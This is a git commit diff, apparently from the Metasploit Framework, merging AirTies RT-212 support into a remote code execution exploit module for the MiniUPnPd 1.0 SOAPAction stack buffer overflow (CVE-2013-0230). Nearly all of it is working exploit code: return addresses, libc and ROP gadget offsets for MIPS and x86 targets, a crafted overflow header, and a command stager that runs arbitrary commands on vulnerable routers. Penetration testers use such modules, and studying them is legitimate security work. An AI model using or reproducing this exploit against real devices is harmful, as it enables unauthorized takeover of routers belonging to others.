Merge branch 'jvazquez-r7-review_5280' into airties_upnpd_bof
commit
7f1f383392
|
@ -1,132 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
Rank = NormalRanking
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
|
||||
present in the SOAPAction HTTP header handling.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', # Vulnerability discovery
|
||||
'Dejan Lukan', # orig Metasploit module
|
||||
'Onur ALANBEL', # exploit for Airties router
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module for Airties router
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0230' ],
|
||||
[ 'OSVDB', '89624' ],
|
||||
[ 'BID', '57608' ],
|
||||
[ 'EDB', '36839' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
|
||||
{
|
||||
'Offset' => 2048,
|
||||
'LibcBase' => 0x2aabd000,
|
||||
'System' => 0x00031AC0,
|
||||
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
|
||||
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 27 2013',
|
||||
'DefaultTarget' => 0))
|
||||
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(5555),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "/",
|
||||
})
|
||||
|
||||
if res && res.headers['Server'] == target['ServerHeader']
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Accessing the vulnerable URL...")
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
|
||||
end
|
||||
|
||||
#
|
||||
# Build and send the HTTP request
|
||||
#
|
||||
print_status("#{peer} - Sending exploit to victim #{target.name}")
|
||||
execute_cmdstager(
|
||||
:flavor => :echo
|
||||
)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# Build the SOAP Exploit
|
||||
# a valid action
|
||||
sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
|
||||
sploit << rand_text_alpha_upper(target['Offset'])
|
||||
sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
|
||||
sploit << rand_text_alpha_upper(24) # $s1 - $s6
|
||||
sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
|
||||
|
||||
# 0001CC94 addiu $a0, $sp, 0x18
|
||||
# 0001CC98 move $t9, $s0
|
||||
# 0001CC9C jalr $t9
|
||||
# 0001CCA0 li $a1, 1
|
||||
|
||||
sploit << rand_text_alpha_upper(24) #filler
|
||||
sploit << cmd
|
||||
|
||||
# data sent in the POST body
|
||||
data =
|
||||
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
|
||||
"<SOAP-ENV:Envelope\r\n" +
|
||||
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
|
||||
">\r\n" +
|
||||
"<SOAP-ENV:Body>\r\n" +
|
||||
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
|
||||
"</ns1:action>\r\n" +
|
||||
"</SOAP-ENV:Body>\r\n" +
|
||||
"</SOAP-ENV:Envelope>\r\n"
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "/",
|
||||
'headers' => {
|
||||
'SOAPAction' => sploit,
|
||||
},
|
||||
'data' => data,
|
||||
})
|
||||
end
|
||||
end
|
|
@ -7,6 +7,8 @@ require 'msf/core'
|
|||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
Rank = NormalRanking
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -19,20 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'hdm', # Vulnerability discovery
|
||||
'Dejan Lukan' # Metasploit module
|
||||
'Dejan Lukan', # Metasploit module, debian target
|
||||
'Onur ALANBEL', # Expliot for Airties target
|
||||
'm-1-k-3' # Metasploit module, Airties target
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DefaultOptions' => { 'EXITFUNC' => 'process', },
|
||||
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
|
||||
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
|
||||
# of the program is never reached)
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2060,
|
||||
'BadChars' => "\x00\x22",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X86, ARCH_MIPSBE],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-0230' ],
|
||||
|
@ -40,14 +36,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'BID', '57608' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
|
||||
],
|
||||
'Targets' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
|
||||
{
|
||||
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
|
||||
'Offset' => 2123
|
||||
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
|
||||
'Offset' => 2123,
|
||||
'Arch' => ARCH_X86,
|
||||
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
|
||||
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
|
||||
# of the program is never reached)
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2060,
|
||||
'BadChars' => "\x00\x22"
|
||||
},
|
||||
:callback => :target_debian
|
||||
}
|
||||
],
|
||||
[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
|
||||
{
|
||||
'Offset' => 2048,
|
||||
'LibcBase' => 0x2aabd000,
|
||||
'System' => 0x00031AC0,
|
||||
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
|
||||
'Fingerprint' => 'AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
:callback => :target_airties
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
|
@ -57,9 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options([
|
||||
Opt::RPORT(5555),
|
||||
], self.class)
|
||||
|
||||
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/'
|
||||
})
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
fingerprints = targets.collect { |t| t['Fingerprint'] }
|
||||
fingerprints.delete(nil)
|
||||
|
||||
if res && fingerprints.include?(res.headers['Server'])
|
||||
vprint_status("Fingerprint: #{res.headers['Server']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless self.respond_to?(target[:callback])
|
||||
fail_with(Failure::BadConfig, 'Invalid target specified: no callback function defined')
|
||||
end
|
||||
|
||||
self.send(target[:callback])
|
||||
end
|
||||
|
||||
def target_debian
|
||||
#
|
||||
# Build the SOAP Exploit
|
||||
#
|
||||
|
@ -108,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
# Build and send the HTTP request
|
||||
#
|
||||
print_status("Sending exploit to victim #{target.name} at ...")
|
||||
print_status("Sending exploit to victim #{target.name}...")
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "/",
|
||||
|
@ -121,4 +173,53 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# disconnect from the server
|
||||
disconnect
|
||||
end
|
||||
|
||||
def target_airties
|
||||
print_status("Sending exploit to victim #{target.name}...")
|
||||
execute_cmdstager(
|
||||
:flavor => :echo
|
||||
)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# Build the SOAP Exploit
|
||||
# a valid action
|
||||
sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
|
||||
sploit << rand_text_alpha_upper(target['Offset'])
|
||||
sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
|
||||
sploit << rand_text_alpha_upper(24) # $s1 - $s6
|
||||
sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
|
||||
# 0001CC94 addiu $a0, $sp, 0x18
|
||||
# 0001CC98 move $t9, $s0
|
||||
# 0001CC9C jalr $t9
|
||||
# 0001CCA0 li $a1, 1
|
||||
|
||||
sploit << rand_text_alpha_upper(24) #filler
|
||||
sploit << cmd
|
||||
|
||||
# data sent in the POST body
|
||||
data =
|
||||
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
|
||||
"<SOAP-ENV:Envelope\r\n" +
|
||||
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
|
||||
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
|
||||
">\r\n" +
|
||||
"<SOAP-ENV:Body>\r\n" +
|
||||
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
|
||||
"</ns1:action>\r\n" +
|
||||
"</SOAP-ENV:Body>\r\n" +
|
||||
"</SOAP-ENV:Envelope>\r\n"
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
{
|
||||
'SOAPAction' => sploit,
|
||||
},
|
||||
'data' => data
|
||||
})
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue